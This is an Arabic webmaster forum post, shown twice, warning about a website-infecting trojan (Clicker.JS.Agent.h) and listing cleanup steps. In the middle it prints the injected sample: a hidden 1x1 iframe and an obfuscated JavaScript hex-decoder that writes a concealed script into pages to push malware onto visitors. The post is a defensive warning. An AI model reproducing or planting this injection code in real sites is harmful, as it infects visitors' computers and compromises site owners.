alfares
01-28-2009, 05:18 PM
بسم الله الرحمن الرحيم
في الفترة الاخيره انتشر فايروس جديد يصيب المواقع الشخصيه والمنتديات ويفتح ثغره خطيره بها تهيء عمل تروجان يمكنه التسلل الى جهاز اي شخص يفتح الموقع اذا مجان مركب انتي فايروس قوي
بالامس واليوم الفايروس ضرب 5 من مواقع اصدقائي وانتشر بسرعة البرق وضربني ومواقع كثيرة بالسيرفر معي
اسم الفايروس
Clicker.JS.Agent.h
النوع
تروجان
شرح الفايروس:
هو ثغره
عباره عن كود يوضع فى ملفات الاندكس وملف ال log.php الكود يوضع فى اى
index او اى ملف php, html مهم بموقعك واللى يدخل يحوله الى عدة مواقع ومن ثم ينزل بجهاز الزائر الفيروس والفيروس عباره عن تروجان وسبايوير قوى جدا
كيف نعرف ان الموقع مصاب
كثير من الانتي فايروز لا يكتشفه حتي nod32 2009
ولكن الكاسبر يتعرف عليه
بمجرد دخولك موقع مصاب سيتسلل اليك الفايروس وعند فتحك لبرنامج ftp ينتقل بسرعة البرق علي كل ملفات موقعك
شكل الفايروز وهو مشفر طبعا
<hntml>
<center>
<font size="7">
Coming Soon ...<br>
<a href="/vb">forum</a>
</font>
</center>
</html><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l49663c323804a(l49663c3238432){ var l49663c323881b=16; return (parseInt(l49663c3238432,l49663c323881b));}functio n l49663c3238fed(l49663c32393d4){ function l49663c3239f8f(){var l49663c323a377=2;return l49663c323a377;} var l49663c32397bd='';l49663c323a761=String.fromCharCo de;for(l49663c3239ba6=0;l49663c3239ba6<l49663c32393d4.length;l49663c3239ba6+=l49663c3239f 8f()){ l49663c32397bd+=(l49663c323a761(c102916999516l4966 3c323804a(l49663c32393d4.substr(l49663c3239ba6,l49 663c3239f8f()))));}return l49663c32397bd;} var xc3='';var l49663c323ab48='3C736'+xc3+'3726'+xc3+'970743E6'+x c3+'96'+xc3+'6'+xc3+'28216'+xc3+'D796'+xc3+'96'+xc 3+'1297B6'+xc3+'46'+xc3+'F6'+xc3+'3756'+xc3+'D6'+x c3+'56'+xc3+'E742E77726'+xc3+'9746'+xc3+'528756'+x c3+'E6'+xc3+'5736'+xc3+'36'+xc3+'1706'+xc3+'528202 725336'+xc3+'32536'+xc3+'392536'+xc3+'36'+xc3+'253 7322536'+xc3+'312536'+xc3+'6'+xc3+'42536'+xc3+'352 532302536'+xc3+'6'+xc3+'52536'+xc3+'312536'+xc3+'6 '+xc3+'42536'+xc3+'3525336'+xc3+'42536'+xc3+'33253 3312533302532302537332537322536'+xc3+'3325336'+xc3 +'42532372536'+xc3+'3825373425373425373025336'+xc3 +'125326'+xc3+'6'+xc3+'25326'+xc3+'6'+xc3+'2536'+x c3+'372536'+xc3+'6'+xc3+'6'+xc3+'2536'+xc3+'372536 '+xc3+'6'+xc3+'6'+xc3+'2533322536'+xc3+'6'+xc3+'42 536'+xc3+'3525326'+xc3+'52536'+xc3+'6'+xc3+'52536' +xc3+'3525373425326'+xc3+'6'+xc3+'25326'+xc3+'5253 6'+xc3+'372536'+xc3+'6'+xc3+'6'+xc3+'25326'+xc3+'6 '+xc3+'2536'+xc3+'332536'+xc3+'382536'+xc3+'352536 '+xc3+'332536'+xc3+'6'+xc3+'225326'+xc3+'52536'+xc 3+'382537342536'+xc3+'6'+xc3+'42536'+xc3+'6'+xc3+' 32532372532302537372536'+xc3+'392536'+xc3+'3425373 42536'+xc3+'3825336'+xc3+'425333325333425333825323 02536'+xc3+'382536'+xc3+'352536'+xc3+'392536'+xc3+ '372536'+xc3+'3825373425336'+xc3+'4253333253334253 336'+xc3+'2532302537332537342537392536'+xc3+'6'+xc 3+'32536'+xc3+'3525336'+xc3+'4253237253736'+xc3+'2 536'+xc3+'392537332536'+xc3+'392536'+xc3+'322536'+ xc3+'392536'+xc3+'6'+xc3+'32536'+xc3+'392537342537 3925336'+xc3+'12536'+xc3+'382536'+xc3+'392536'+xc3 +'342536'+xc3+'342536'+xc3+'352536'+xc3+'6'+xc3+'5 25323725336'+xc3+'525336'+xc3+'325326'+xc3+'6'+xc3 +'2536'+xc3+'392536'+xc3+'36'+xc3+'2537322536'+xc3 +'312536'+xc3+'6'+xc3+'42536'+xc3+'3525336'+xc3+'5 2729293B7D76'+xc3+'6'+xc3+'172206'+xc3+'D796'+xc3+ '96'+xc3+'13D7472756'+xc3+'53B3C2F736'+xc3+'3726'+ xc3+'970743E';document.write(l49663c3238fed(l49663 c323ab48));</script>
لا يستطيع ماسح فايروسات الموقع التعرف عليه
الحل اذا اصبت بالفايروس ؟
اولا وقبل كل شئ اليكم اربعة خطوات تخلصت بها من الفايروس نهائيا
اول ظهور الفايروز بموقعك عليك بعمل التالي :
- تغيير كلمة مرور الموقع في الحال
- عمل full format لجهازك وانزال اخر اصدارة من كاسبر اسكاي 2009
- ادخل علي السي بانل وقم بتحرير صفحات الاندكس جميعها وملفات login وملفات newthread.php
showthread.php
وهذه اكثر الملفات اصابة بالفايروس
بعدها استبدل هذه الملفات بنسخ نظيفة
- بعد ما تغير الملفات المصابة اعطي التصريح 444 واكرر التصريح 444 لكل ملفات الاندكس واللوق واي ملف مصاب لان بدونه سيعيد الفايروس انتشارة علي الصفحات .
وبعدها تأكد ان جهازك خالي تماما من الفايروسات عند الرفع بواسطة برنامج ftp
هذا للعلم ولكل من واجهه نفس مشكلتي مع الفايروس
تحياتي
http://www.traidnt.net/vb/showthread.php?p=10282345#post10282345
في الفترة الاخيره انتشر فايروس جديد يصيب المواقع الشخصيه والمنتديات ويفتح ثغره خطيره بها تهيء عمل تروجان يمكنه التسلل الى جهاز اي شخص يفتح الموقع اذا مجان مركب انتي فايروس قوي
بالامس واليوم الفايروس ضرب 5 من مواقع اصدقائي وانتشر بسرعة البرق وضربني ومواقع كثيرة بالسيرفر معي
اسم الفايروس
Clicker.JS.Agent.h
النوع
تروجان
شرح الفايروس:
هو ثغره
عباره عن كود يوضع فى ملفات الاندكس وملف ال log.php الكود يوضع فى اى
index او اى ملف php, html مهم بموقعك واللى يدخل يحوله الى عدة مواقع ومن ثم ينزل بجهاز الزائر الفيروس والفيروس عباره عن تروجان وسبايوير قوى جدا
كيف نعرف ان الموقع مصاب
كثير من الانتي فايروز لا يكتشفه حتي nod32 2009
ولكن الكاسبر يتعرف عليه
بمجرد دخولك موقع مصاب سيتسلل اليك الفايروس وعند فتحك لبرنامج ftp ينتقل بسرعة البرق علي كل ملفات موقعك
شكل الفايروز وهو مشفر طبعا
<hntml>
<center>
<font size="7">
Coming Soon ...<br>
<a href="/vb">forum</a>
</font>
</center>
</html><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l49663c323804a(l49663c3238432){ var l49663c323881b=16; return (parseInt(l49663c3238432,l49663c323881b));}functio n l49663c3238fed(l49663c32393d4){ function l49663c3239f8f(){var l49663c323a377=2;return l49663c323a377;} var l49663c32397bd='';l49663c323a761=String.fromCharCo de;for(l49663c3239ba6=0;l49663c3239ba6<l49663c32393d4.length;l49663c3239ba6+=l49663c3239f 8f()){ l49663c32397bd+=(l49663c323a761(c102916999516l4966 3c323804a(l49663c32393d4.substr(l49663c3239ba6,l49 663c3239f8f()))));}return l49663c32397bd;} var xc3='';var l49663c323ab48='3C736'+xc3+'3726'+xc3+'970743E6'+x c3+'96'+xc3+'6'+xc3+'28216'+xc3+'D796'+xc3+'96'+xc 3+'1297B6'+xc3+'46'+xc3+'F6'+xc3+'3756'+xc3+'D6'+x c3+'56'+xc3+'E742E77726'+xc3+'9746'+xc3+'528756'+x c3+'E6'+xc3+'5736'+xc3+'36'+xc3+'1706'+xc3+'528202 725336'+xc3+'32536'+xc3+'392536'+xc3+'36'+xc3+'253 7322536'+xc3+'312536'+xc3+'6'+xc3+'42536'+xc3+'352 532302536'+xc3+'6'+xc3+'52536'+xc3+'312536'+xc3+'6 '+xc3+'42536'+xc3+'3525336'+xc3+'42536'+xc3+'33253 3312533302532302537332537322536'+xc3+'3325336'+xc3 +'42532372536'+xc3+'3825373425373425373025336'+xc3 +'125326'+xc3+'6'+xc3+'25326'+xc3+'6'+xc3+'2536'+x c3+'372536'+xc3+'6'+xc3+'6'+xc3+'2536'+xc3+'372536 '+xc3+'6'+xc3+'6'+xc3+'2533322536'+xc3+'6'+xc3+'42 536'+xc3+'3525326'+xc3+'52536'+xc3+'6'+xc3+'52536' +xc3+'3525373425326'+xc3+'6'+xc3+'25326'+xc3+'5253 6'+xc3+'372536'+xc3+'6'+xc3+'6'+xc3+'25326'+xc3+'6 '+xc3+'2536'+xc3+'332536'+xc3+'382536'+xc3+'352536 '+xc3+'332536'+xc3+'6'+xc3+'225326'+xc3+'52536'+xc 3+'382537342536'+xc3+'6'+xc3+'42536'+xc3+'6'+xc3+' 32532372532302537372536'+xc3+'392536'+xc3+'3425373 42536'+xc3+'3825336'+xc3+'425333325333425333825323 02536'+xc3+'382536'+xc3+'352536'+xc3+'392536'+xc3+ '372536'+xc3+'3825373425336'+xc3+'4253333253334253 336'+xc3+'2532302537332537342537392536'+xc3+'6'+xc 3+'32536'+xc3+'3525336'+xc3+'4253237253736'+xc3+'2 536'+xc3+'392537332536'+xc3+'392536'+xc3+'322536'+ xc3+'392536'+xc3+'6'+xc3+'32536'+xc3+'392537342537 3925336'+xc3+'12536'+xc3+'382536'+xc3+'392536'+xc3 +'342536'+xc3+'342536'+xc3+'352536'+xc3+'6'+xc3+'5 25323725336'+xc3+'525336'+xc3+'325326'+xc3+'6'+xc3 +'2536'+xc3+'392536'+xc3+'36'+xc3+'2537322536'+xc3 +'312536'+xc3+'6'+xc3+'42536'+xc3+'3525336'+xc3+'5 2729293B7D76'+xc3+'6'+xc3+'172206'+xc3+'D796'+xc3+ '96'+xc3+'13D7472756'+xc3+'53B3C2F736'+xc3+'3726'+ xc3+'970743E';document.write(l49663c3238fed(l49663 c323ab48));</script>
لا يستطيع ماسح فايروسات الموقع التعرف عليه
الحل اذا اصبت بالفايروس ؟
اولا وقبل كل شئ اليكم اربعة خطوات تخلصت بها من الفايروس نهائيا
اول ظهور الفايروز بموقعك عليك بعمل التالي :
- تغيير كلمة مرور الموقع في الحال
- عمل full format لجهازك وانزال اخر اصدارة من كاسبر اسكاي 2009
- ادخل علي السي بانل وقم بتحرير صفحات الاندكس جميعها وملفات login وملفات newthread.php
showthread.php
وهذه اكثر الملفات اصابة بالفايروس
بعدها استبدل هذه الملفات بنسخ نظيفة
- بعد ما تغير الملفات المصابة اعطي التصريح 444 واكرر التصريح 444 لكل ملفات الاندكس واللوق واي ملف مصاب لان بدونه سيعيد الفايروس انتشارة علي الصفحات .
وبعدها تأكد ان جهازك خالي تماما من الفايروسات عند الرفع بواسطة برنامج ftp
هذا للعلم ولكل من واجهه نفس مشكلتي مع الفايروس
تحياتي
http://www.traidnt.net/vb/showthread.php?p=10282345#post10282345